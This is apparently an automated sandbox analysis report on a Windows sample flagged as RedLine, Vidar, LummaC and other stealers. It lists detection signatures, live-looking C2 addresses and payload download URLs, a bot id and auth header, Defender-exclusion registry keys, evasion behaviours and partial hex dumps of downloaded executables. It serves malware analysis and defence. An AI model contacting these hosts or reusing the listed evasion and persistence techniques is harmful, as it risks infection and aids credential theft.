Windows Analysis Report
WlCIinu0yp.exe

Overview

General Information

Sample name: WlCIinu0yp.exe
renamed because original name is a hash value
Original sample name: 28d853922cf07f58ea8f4a81492120ae.exe
Analysis ID: 1434501
MD5: 28d853922cf07f58ea8f4a81492120ae
SHA1: e957c503b201179bc7901256bf37ff292705e805
SHA256: e62b73e7f0b73dcdcf303dcd3f587a54a684d0ab4c0dd1e90b3a8b39502a9a38
Tags: exe

Detection

LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Yara detected Socks5Systemz
Yara detected Vidar stealer
Yara detected zgRAT
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files to the document folder of the user
Exclude list of file types from scheduled, custom, and real-time scanning
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies Group Policy settings
Modifies power options to not sleep / hibernate
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Windows Defender Exclusions Added - Registry
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: WlCIinu0yp.exe Avira: detected
Source: http://193.233.132.139/ Avira URL Cloud: Label: phishing
Source: https://monoblocked.com/525403/setup.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe Avira: detection malicious, Label: HEUR/AGEN.1357328
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe Avira: detection malicious, Label: TR/Miner.mdqej
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe Avira: detection malicious, Label: TR/Miner.mdqej
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Avira: detection malicious, Label: HEUR/AGEN.1306558
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe Avira: detection malicious, Label: TR/Redcap.nszjr
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe Avira: detection malicious, Label: HEUR/AGEN.1357328
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\060[1].exe Avira: detection malicious, Label: HEUR/AGEN.1332570
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Avira: detection malicious, Label: HEUR/AGEN.1306558
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe Avira: detection malicious, Label: TR/Redcap.nszjr
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe Avira: detection malicious, Label: HEUR/AGEN.1306558
Source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "03cea2609023d13f145ac6c5dc897112", "Version": "9.3"}
Source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack Malware Configuration Extractor: RedLine {"C2 url": ["5.42.65.96:28380"], "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: softjenimmp3converter.exe.3992.49.memstrmin Malware Configuration Extractor: Socks5Systemz {"C2 list": ["cskuxgp.net"]}
Source: monoblocked.com Virustotal: Detection: 15%
Source: pofix.red Virustotal: Detection: 16%
Source: triedchicken.net Virustotal: Detection: 20%
Source: carthewasher.net Virustotal: Detection: 15%
Source: iplis.ru Virustotal: Detection: 10%
Source: http://193.233.132.139/ Virustotal: Detection: 20%
Source: https://monoblocked.com/ Virustotal: Detection: 15%
Source: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe ReversingLabs: Detection: 36%
Source: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe ReversingLabs: Detection: 70%
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe ReversingLabs: Detection: 95%
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Default12_big[1].exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space1.9_big[1].exe ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy) ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe ReversingLabs: Detection: 70%
Source: WlCIinu0yp.exe ReversingLabs: Detection: 57%
Source: WlCIinu0yp.exe Virustotal: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe Joe Sandbox ML: detected
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\setup[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\aeb24096[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack
Source: unknown HTTPS traffic detected: 172.67.75.163:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.111:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.144.181:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.121:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.55.189:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: WlCIinu0yp.exe
Source: Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000000.1909451075.000001C579D82000.00000002.00000001.01000000.00000007.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2953053052.000001C57C160000.00000002.00000001.00040000.00000007.sdmp
Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-280SC.tmp.25.dr
Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2746107478.0000000068E44000.00000002.00000001.01000000.00000021.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004501000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547368675.00000000005A4000.00000040.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3127380532.00000000005EB000.00000040.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538173466.000000000059E000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: WlCIinu0yp.exe
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-OFQC1.tmp.25.dr
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: WlCIinu0yp.exe
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\kkelsch\Documents\PushNotifications\PushSharp\PushSharp-master\PushSharp.Core\obj\Debug\PushSharp.Core.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005DCA000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004C88000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\Program Files\Microsoft Enterprise Library January 2006\src\Data\obj\Debug\Microsoft.Practices.EnterpriseLibrary.Data.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-280SC.tmp.25.dr

Change of critical system settings

Source: C:\Users\user\Desktop\WlCIinu0yp.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004DB1CB FindFirstFileExW,GetLastError, 7_2_004DB1CB
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 7_2_0040B300
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Traffic Snort IDS: 2049837 ET TROJAN Suspected PrivateLoader Activity (POST) 192.168.2.4:49730 -> 5.42.66.10:80
Source: Malware configuration extractor URLs: cskuxgp.net
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199680449169
Source: Malware configuration extractor URLs: 5.42.65.96:28380
Source: global traffic TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: PaYqxdT7Epov9iGUzAxGNwu7.exe.0.dr
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: b4GIFfxokws3p_peAzAPeg9D.exe.0.dr
Source: DNS query: f.123654987.xyz
Source: global traffic TCP traffic: 192.168.2.4:49806 -> 5.42.66.10:50505
Source: global traffic TCP traffic: 192.168.2.4:49808 -> 95.217.245.42:9000
Source: global traffic TCP traffic: 192.168.2.4:49809 -> 147.45.47.93:58709
Source: global traffic TCP traffic: 192.168.2.4:49810 -> 5.42.65.96:28380
Source: global traffic TCP traffic: 192.168.2.4:49832 -> 193.233.132.253:50500
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.52 (Ubuntu)Content-Description: File TransferContent-Disposition: attachment; filename=timeSync.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 218112Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 01 May 2024 06:40:20 GMTContent-Type: application/octet-streamContent-Length: 3196416Last-Modified: Wed, 01 May 2024 03:58:33 GMTConnection: keep-aliveETag: "6631bde9-30c600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Retailer_prog.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5809400Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 02 Apr 2024 08:24:20 GMTETag: "ab2000-61518d52a9500"Accept-Ranges: bytesContent-Length: 11214848Content-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 db 4c 00 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 2e ca 00 00 00 00 00 79 fc 01 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 a1 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 01 64 00 00 00 00 10 a1 01 58 2c 00 00 60 d8 a0 01 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 fb 00 28 00 00 00 20 d7 a0 01 38 01 00 00 00 00 00 00 00 00 00 00 00 10 f6 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e6 7e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f0 1d 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 e9 c9 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 a0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 b0 ca 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 e3 34 2b 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 38 08 00 00 00 10 f6 00 00 0a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 5c e3 aa 00 00 20 f6 00 00 e4 aa 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 58 2c 00 00 00 10 a1 01 00 2e 00 00 00 f2 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:23 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Default12_big.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5929720Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 a6 08 00 00 00 00 00 94 43 cf 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 d2 00 00 02 00 00 10 e0 5a 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 cf 00 4c 00 00 00 4c 40 cf 00 